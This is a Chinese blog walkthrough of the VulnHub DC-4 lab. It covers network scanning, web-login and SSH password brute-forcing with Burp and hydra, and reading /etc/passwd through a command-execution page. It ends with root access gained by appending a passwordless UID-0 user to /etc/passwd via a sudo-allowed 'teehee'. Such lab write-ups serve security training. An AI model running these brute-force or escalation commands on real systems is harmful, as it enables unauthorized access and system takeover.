您当前的位置: 首页 > 

Snakin_ya

暂无认证

  • 5浏览

    0关注

    107博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

[VulnHub]DC-4

Snakin_ya 发布时间:2021-09-07 00:14:21 ,浏览量:5

测试人员:cosmos

目标地址:192.168.131.130

目标账号:未知

目标主机:未知

信息搜集

1.netdiscover

netdiscover -r 192.168.131.0/24

image-20210822152031980

2.masscan

masscan --rate=10000 --ports 0-65535 192.168.131.130

image-20210822152223001

3.nmap

nmap -A 192.168.131.130

image-20210822220917092

网站测试

进入网站

image-20210822152447241

发现需要登录,提示admin登录,猜测用户名是admin,利用burp爆破密码

image-20210822214545777

得到密码为happy,登录

image-20210822214818797

进入以后发现可以执行命令,我们抓包看看

image-20210822152610657

这里发现可以支持自己修改执行命令

根目录中没有内容,我们可以看看etc/passwd

在Linux 中/etc/passwd文件中每个用户都有一个对应的记录行,它记录了这个用户的一些基本属性。系统管理员经常会接触到这个文件的修改以完成对用户的管理工作。

cat+/etc/passwd

image-20210822215615335

我们发现了charles,jim,sam三个用户

依次查看三个用户的目录,jim目录下发现一份备份密码,保存下来

image-20210822220331697

因为开放了22端口,这个时候我们可以尝试连接ssh,利用hydra爆破密码

hydra 192.168.131.130 ssh -l jim -P bac.txt -t 20 -V -f

命令详细:

  • 攻击目标:192.168.131.130

  • 使用的模块:ssh

  • 爆破用户名:jim (-l)

  • 使用的密码字典:bac.txt (-P)

  • 爆破线程数:20 (-t)

  • 显示详细信息 (-V)

  • 爆破成功一个后停止 (-f)

    image-20210822225945247

账号:jim   密码:jibril04
ssh连接

接下来连接ssh

ssh jim@192.168.131.130

image-20210822224407050

查看mbox的内容,发现是一封信件

image-20210822224034957

而信件在var/mail目录,进入,发现有一封charles写的信并告知了密码

image-20210822223732113

账号:charles     密码:^xHhA&hvim0y

切换用户

su charles

使用sudo命令查看charles用户可以哪些具有root权限的命令,发现可以使用teehee命令

image-20210822224739714

teehee命令可以写入文件内容并不覆盖文件原有内容

使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并加入到root组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换到admin用户,成功提权

image-20210822225402775

关注
打赏
1650510800
查看更多评论
立即登录/注册

微信扫码登录

0.0381s